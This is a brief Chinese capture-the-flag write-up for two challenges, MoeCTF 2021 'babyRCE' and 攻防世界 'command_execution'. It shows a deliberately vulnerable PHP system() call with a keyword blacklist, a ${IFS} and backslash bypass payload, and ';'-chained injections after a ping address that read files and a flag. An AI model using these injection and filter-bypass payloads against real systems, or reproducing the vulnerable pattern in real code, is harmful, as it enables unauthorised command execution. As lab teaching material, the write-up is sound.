[MoeCTF 2021]babyRCE
考点:关键词过滤(绕过方法参考往期博客)
来源:nssctf
<?php$rce = $_GET['rce'];
if (isset($rce)) {if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {system($rce);}else {echo "hhhhhhacker!!!"."\n";}
} else {highlight_file(__FILE__);
}
先用ls查看

空格可以用${IFS}绕过
构造payload:?rce=ca\t${IFS}fl\ag.php

command_execution
考点:命令执行
来源:攻防世界

先ping一下127.0.0.1

再用;来连接两个命令 127.0.0.1;ls

试试看能不能查看inddex.php
127.0.0.1;cat index.php

很明显,不行,那就退级看看

在home中发现flag。

查看flag
127.0.0.1;cat …/…/…/home/flag.txt

cyberpeace{ac541782e73fa1da4a98ec4bc3449fb1}